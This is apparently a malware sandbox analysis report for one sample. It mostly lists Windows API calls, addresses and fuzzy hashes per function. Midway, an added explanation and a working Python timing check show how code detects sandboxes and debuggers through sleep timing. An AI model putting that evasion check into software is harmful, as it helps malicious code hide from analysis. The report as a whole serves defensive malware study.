                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 0bad1938e3ca5bca390937c7ebe71134105ad794880a4fe48e8ed3f78a9c4695
                                                          • Instruction ID: 31f90a9efe5e4303070d6f5ab4e19e3704c427d9da43ef09f89d522abe15838b
                                                          • Opcode Fuzzy Hash: 0bad1938e3ca5bca390937c7ebe71134105ad794880a4fe48e8ed3f78a9c4695
                                                          • Instruction Fuzzy Hash: 6311E432D046047EDB0BB7B49C879BE7BADDF41320F14806AF104AF296DF6158454BA5
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003B18B9
                                                            • Part of subcall function 003B1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B1962
                                                            • Part of subcall function 003B1943: InternetCloseHandle.WININET(00000000), ref: 003B19FF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                                          • Instruction ID: 7ce540a156166345d0b97c408db9ea913e3fa286294293f22069c13fe2166be2
                                                          • Opcode Fuzzy Hash: bfc95d0e6113a64ddc9ad0b3a53133a640890752d51b5aa86bce20fd034cad02
                                                          • Instruction Fuzzy Hash: 9421CF71200605BFEB139F608C20FBBB7AEFF48704F40412AFB15D6A50DB31A9119790
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,003CFAC0), ref: 003A3AA8
                                                          • GetLastError.KERNEL32 ref: 003A3AB7
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003A3AC6
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003CFAC0), ref: 003A3B23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 3b87f9879b73265d145c6627abd5a7f5d30a3c4deb78110977c6c10947c8550b
                                                          • Instruction ID: a17bad99f2c490ba084eb28ae4593a03c82d448ed77ec65432c5c9891316e2c5
                                                          • Opcode Fuzzy Hash: 3b87f9879b73265d145c6627abd5a7f5d30a3c4deb78110977c6c10947c8550b
                                                          • Instruction Fuzzy Hash: E521C7745083019F8302DF28C8809ABB7E9EF56764F144A1EF499CB2A1D730EE45CB92
                                                          APIs
                                                          • _free.LIBCMT ref: 00375281
                                                            • Part of subcall function 0036588C: __FF_MSGBANNER.LIBCMT ref: 003658A3
                                                            • Part of subcall function 0036588C: __NMSG_WRITE.LIBCMT ref: 003658AA
                                                            • Part of subcall function 0036588C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001,00000000,?,?,?,00360F53,?), ref: 003658CF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 72a690721fcda0d9691b7cec62dac6ce6e1f8ef5c4c14892d4c0121520a9e23b
                                                          • Instruction ID: 8e6111fee5dd972f2bcf5122f0377baa7859d22882668b128450a1d9afa25cfe
                                                          • Opcode Fuzzy Hash: 72a690721fcda0d9691b7cec62dac6ce6e1f8ef5c4c14892d4c0121520a9e23b
                                                          • Instruction Fuzzy Hash: 0411E332505A15AFCB3B2F74AC05A5E3B9CAB05360F21CA39F90DAE152DEB88D408794
                                                          APIs
                                                          • _memset.LIBCMT ref: 00344560
                                                            • Part of subcall function 0034410D: _memset.LIBCMT ref: 0034418D
                                                            • Part of subcall function 0034410D: _wcscpy.LIBCMT ref: 003441E1
                                                            • Part of subcall function 0034410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003441F1
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 003445B5
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003445C4
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0037D5FE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 2f7d5bc8932e742d1aa062d1b00ac1402d368a4802026d220b867029e366fb38
                                                          • Instruction ID: f264df8810b8490887457b7568e05d838bca23fee63b7b5f1e284c97781eb7f0
                                                          • Opcode Fuzzy Hash: 2f7d5bc8932e742d1aa062d1b00ac1402d368a4802026d220b867029e366fb38
                                                          • Instruction Fuzzy Hash: 7921AAB05047849FEB338B24D855BE7BBEC9F12318F04409DE69D9A245D77469848B51
                                                          APIs
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003A793F,?,?,00000000), ref: 00345B8C
                                                            • Part of subcall function 00345B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003A793F,?,?,00000000,?,?), ref: 00345BB0
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 003B64AF
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B64BA
                                                          • _memmove.LIBCMT ref: 003B64E7
                                                          • inet_ntoa.WSOCK32(?), ref: 003B64F2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: f9eeb2915d090ea0ce203086d67b629fb6fffc7404f4c471bb1e6c0fec0129cd
                                                          • Instruction ID: 15d42bbc531086cfd2572962bf6ec3b7e4f615662fc3731c4ed69a579d58ce60
                                                          • Opcode Fuzzy Hash: f9eeb2915d090ea0ce203086d67b629fb6fffc7404f4c471bb1e6c0fec0129cd
                                                          • Instruction Fuzzy Hash: 4C111C71900108AFCB06FBA4DD86DEEB7BDAF04310B148065F506AF262DB31AE14DB61
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00398E23
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398E35
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398E4B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00398E66
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                                          • Instruction ID: eca34fa29325f497925e3ea17697b8727207d69bffc5dbdb2321c0c5d6bf5473
                                                          • Opcode Fuzzy Hash: b1a5f12190042a69b6844b4e9d4fc15efa43e8c24839080110274dea7f6e9ccb
                                                          • Instruction Fuzzy Hash: 5011187AD01218FFEF11DFA5C885EADBBB8FB49710F204095E904B7290DA716E10DB94
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                                          • GetClientRect.USER32(?,?), ref: 0037B77B
                                                          • GetCursorPos.USER32(?), ref: 0037B785
                                                          • ScreenToClient.USER32(?,?), ref: 0037B790
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 340ce94d2a9895431a1922ebc17a82b8a757e69e792d7171d44097e1048b0597
                                                          • Instruction ID: d06574e34e16947be6643bfad37c4145966877abfeeac2fe2bce7fdb9cf0b240
                                                          • Opcode Fuzzy Hash: 340ce94d2a9895431a1922ebc17a82b8a757e69e792d7171d44097e1048b0597
                                                          • Instruction Fuzzy Hash: D2113A35600519EFCB12EFA4D889DFE77F9EB05300F404866F941EB250D770BA918BA5
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A1490
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A14B5
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A14BF
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,003A001E,?,003A1071,?,00008000), ref: 003A14F2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: f485a08b8270a4013f35f8e368adda751ee645d2ee1c9ac9282271a51f1c2ee1
                                                          • Instruction ID: 60774e7e8f59902a1e9ec1106acf3ff6db0fbc81118e82ee93f1ce798ff1a5e2
                                                          • Opcode Fuzzy Hash: f485a08b8270a4013f35f8e368adda751ee645d2ee1c9ac9282271a51f1c2ee1
                                                          • Instruction Fuzzy Hash: 71115B31C0052DDBCF069FAAD989AFEBB78FF0EB11F054156E940B6240CB30A560CBA5
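The record above is the shape of a timing check: two QueryPerformanceCounter reads around a Sleep, then a comparison. The report shows the call sequence, not the thresholds the function applies, so the following is an added example of what such a sequence normally implements; it is not code recovered from the sample, and the half/tenfold thresholds are this example's own choices. On Windows, CPython backs `time.perf_counter()` with QueryPerformanceCounter and `time.sleep()` with the Sleep family, so the measurement is the same pattern; elsewhere it runs on the platform's monotonic clock.

```python
"""Timing check of the QueryPerformanceCounter / Sleep / QueryPerformanceCounter
kind: time a requested Sleep and treat a large deviation as evidence that
something is interfering with execution.

Added example, not code from the sample. Thresholds are illustrative.
"""
import time


def measure_sleep_ms(requested_ms):
    """Request a sleep and return how long it really took, in milliseconds."""
    t0 = time.perf_counter()          # QueryPerformanceCounter on Windows
    time.sleep(requested_ms / 1000.0)  # Sleep on Windows
    return (time.perf_counter() - t0) * 1000.0


def classify(elapsed_ms, requested_ms, slow_factor=10.0, slack_ms=50.0):
    """Classify one measured sleep.

    'fast': returned in under half the requested time. A genuine Sleep does
            not return that early; a sandbox that patches Sleep to skip
            ahead (without also advancing the performance counter) does.
    'slow': took more than slow_factor times the request plus slack_ms,
            the usual signature of a debugger breaking or single-stepping
            between the two counter reads.
    'ok':   anything else, which covers normal scheduler jitter.
    """
    if elapsed_ms < requested_ms / 2.0:
        return "fast"
    if elapsed_ms > requested_ms * slow_factor + slack_ms:
        return "slow"
    return "ok"


def timing_check(requested_ms=100):
    """The check as a sample would run it: one measurement, one verdict."""
    return classify(measure_sleep_ms(requested_ms), requested_ms)


if __name__ == "__main__":
    print(timing_check())
```

The check is two-sided, which is the point for analysts: a sandbox that shortens sleeps to speed up analysis trips the "fast" branch just as a debugger trips the "slow" one, so a sleep skip has to advance the clock the sample reads by the same amount to stay invisible.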
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0039DB5C
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0039DB73
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0039DB88
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0039DBA6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                                          • Instruction ID: ca16e1b461bca86695fd5a1f8349f397f36e7deddd99e58eea2f60792cfcca43
                                                          • Opcode Fuzzy Hash: 0f8d76de69e275e7aab28a8f8c8187053847c864639a14316fcb1fb7b9117d0d
                                                          • Instruction Fuzzy Hash: 3D11C0B1201304EFEB228F11DC4AF97BBBCEF00B00F118569A656C6440D7B0E914DBA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 34f63ce1edea435700d61fef3c5e8b14ab1c6041215ce970902028deae2b34ce
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: AE014B3204814EBBCF235E84CC458EE3F26BF19354B9A8425FE5C98531D33AC9B1AB81
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 003CB318
                                                          • ScreenToClient.USER32(?,?), ref: 003CB330
                                                          • ScreenToClient.USER32(?,?), ref: 003CB354
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003CB36F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                                          • Instruction ID: 66943820033fbdb69ae3086b13ae5a9e23e70ebaae99b71e9f69d86de1bb90e6
                                                          • Opcode Fuzzy Hash: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                                          • Instruction Fuzzy Hash: B5114679D00249EFDB41DF98C544AEEFBB9FB08310F104166E914E3220D735AA658F50
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003A6C8F
                                                            • Part of subcall function 003A776D: _memset.LIBCMT ref: 003A77A2
                                                          • _memmove.LIBCMT ref: 003A6CB2
                                                          • _memset.LIBCMT ref: 003A6CBF
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003A6CCF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: 901ca615e816827c6436f3512d8f6c6602f6485abaf2cad4d80a57d6603aa71e
                                                          • Instruction ID: ddb14e73785d094c553281f4233de857b8bcda0bf1934b5f0a5f6a4c89546f0e
                                                          • Opcode Fuzzy Hash: 901ca615e816827c6436f3512d8f6c6602f6485abaf2cad4d80a57d6603aa71e
                                                          • Instruction Fuzzy Hash: 4AF0F47A104104ABCF126F55DC85E4ABB2AEF45320F14C065FE099E21AC775A911DBB4
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0039A179
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039A18C
                                                          • GetCurrentThreadId.KERNEL32 ref: 0039A193
                                                          • AttachThreadInput.USER32(00000000), ref: 0039A19A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 6df611b1e3aa95e24ca32f004104b777d48ea4551fba7c67cffaba3f79db3942
                                                          • Instruction ID: c3988045878e59503bd29ac357f5f38515d76ab22637f6c83ad47777bb133113
                                                          • Opcode Fuzzy Hash: 6df611b1e3aa95e24ca32f004104b777d48ea4551fba7c67cffaba3f79db3942
                                                          • Instruction Fuzzy Hash: E4E03931141228BEEB225BA2DC0CED73F1DEF267A1F008125F508C4060C6759550CBE0
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00342231
                                                          • SetTextColor.GDI32(?,000000FF), ref: 0034223B
                                                          • SetBkMode.GDI32(?,00000001), ref: 00342250
                                                          • GetStockObject.GDI32(00000005), ref: 00342258
                                                          • GetWindowDC.USER32(?,00000000), ref: 0037C003
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0037C010
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0037C029
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0037C042
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0037C062
                                                          • ReleaseDC.USER32(?,00000000), ref: 0037C06D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: f20bf85cee7e04f2b419d52ca6e866ca576d68414c2de6b22abe8bec09288557
                                                          • Instruction ID: e18598ba91e7625ec023f29b66a20074c594ac7c345768457434bcaf1a9ade5f
                                                          • Opcode Fuzzy Hash: f20bf85cee7e04f2b419d52ca6e866ca576d68414c2de6b22abe8bec09288557
                                                          • Instruction Fuzzy Hash: 87E06D32100644EEEB225F74FC0DBD83B65EB05332F04C366FA69980E187729990DB11
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00398A43
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0039860E), ref: 00398A4A
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0039860E), ref: 00398A57
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0039860E), ref: 00398A5E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                                          • Instruction ID: abb53e11a3de1dfded2898f57c0d11c0b90d8ecea2ae7572d89766d59af1d85d
                                                          • Opcode Fuzzy Hash: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                                          • Instruction Fuzzy Hash: 2AE08676601221EFDB216FB0AD0CF563BADFF51B92F054828B645C9040DA34A445C750
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 003820B6
                                                          • GetDC.USER32(00000000), ref: 003820C0
